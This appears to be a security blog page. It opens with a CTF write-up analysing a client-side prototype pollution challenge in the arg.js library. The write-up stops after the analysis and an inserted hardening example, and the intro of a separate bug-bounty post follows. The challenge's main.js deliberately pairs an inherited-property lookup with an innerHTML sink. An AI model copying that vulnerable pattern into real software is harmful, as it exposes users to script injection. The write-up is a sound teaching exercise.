Yadhu's Blog

Exploiting Client-side Prototype Pollution - arg.js

First of all, a big shoutout to the challenge author. All the challenges in this set are available here.


## Analysis

Going through the challenge source, we can see that two JavaScript files are imported.

```html
<script src="https://raw.githack.com/stretchr/arg.js/master/dist/arg-1.4.js"></script>
<script src="js/main.js"></script>
```

arg-1.4.js is a popular library for parsing URL parameters, and main.js has the following content.

```javascript
// Lookup table for the "type" query parameter
let data = {
    small: "Hi, there!",
    big: "Hello, world!"
}

const vuln = document.querySelector("#vuln");
let queryStrings = window.location.search;
let params = new URLSearchParams(queryStrings);

let vulnParams = () => {
    // The fragment (minus the leading "#") is parsed by Arg.js into an object
    let fragments = Arg.parse(location.hash.substr(1));
    // ?type=<key> is looked up in data and written into the page via innerHTML
    if(data[params.get("type")] !== undefined) vuln.innerHTML = "<h2>"+data[params.get("type")]+"</h2>";
    else vuln.innerHTML = "<h2>This region seems like something you need to look at.</h2>";
}

// Re-run whenever the fragment changes
window.onhashchange = () => {
    vulnParams();
}

vulnParams();
```

We can see that main.js uses the Arg library to parse location.hash and URLSearchParams to parse the query string.
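To make the two weak points in main.js concrete, here is an added example (not code from this post or from the arg.js project): parseNested is a hypothetical minimal stand-in for the bracket syntax Arg.parse accepts, written so that key paths which would reach Object.prototype are dropped, and lookupOwn replaces the `data[...] !== undefined` check with an own-property test so that inherited properties never pass.

```javascript
// Added example, not code from the post or from the arg.js project.
// parseNested is a hypothetical stand-in for Arg.parse's bracket syntax
// (a[b][c]=v); lookupOwn hardens the data[params.get("type")] check.

// Key segments that, written through a plain object, reach Object.prototype.
const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Parse "a[b]=1&c=2" into a prototype-less object. Any key path that
// contains an unsafe segment is dropped instead of being assigned.
function parseNested(qs) {
  const out = Object.create(null); // no prototype chain to pollute
  for (const pair of qs.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? "" : decodeURIComponent(pair.slice(eq + 1));
    // "a[b][c]" -> ["a", "b", "c"]
    const path = decodeURIComponent(rawKey).split(/[\[\]]/).filter(Boolean);
    if (path.length === 0 || path.some((k) => UNSAFE_KEYS.has(k))) continue;
    let cur = out;
    for (let i = 0; i < path.length - 1; i++) {
      if (typeof cur[path[i]] !== "object" || cur[path[i]] === null) {
        cur[path[i]] = Object.create(null);
      }
      cur = cur[path[i]];
    }
    cur[path[path.length - 1]] = value;
  }
  return out;
}

// Own-property lookup for the data table. The page's check,
// data[key] !== undefined, is also satisfied by inherited properties:
// even with nothing polluted, "toString" resolves to Object.prototype.toString.
function lookupOwn(table, key) {
  if (typeof key !== "string") return undefined;
  return Object.prototype.hasOwnProperty.call(table, key) ? table[key] : undefined;
}

// Mirrors the lookup in main.js so the two can be compared side by side.
function lookupNaive(table, key) {
  return table[key] !== undefined ? table[key] : undefined;
}

const data = { small: "Hi, there!", big: "Hello, world!" };
console.log(typeof lookupNaive(data, "toString")); // "function" (inherited)
console.log(lookupOwn(data, "toString"));           // undefined
```

Writing the looked-up value with textContent rather than innerHTML is the remaining fix; it is left out here because the example runs outside a browser.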

Story of My first Bug Bounty

# Intro

Hello everyone, it’s been over a month since I shared something on my blog. I was busy with academic stuff and CTFs. But finally, I have decided to take some time to write a post on my first bug bounty. The bug was small and easy to exploit; however, let this be a motivation to all who haven’t yet found their first bug.

I found the bug on a jewelry website. They did not have any vulnerability disclosure program, but I was lucky enough to get a positive response from them. It was a fine evening; after all the “hustle and bustle” of online classes had ended, I was scrolling through my Instagram feed and noticed an advertisement for a jewelry website.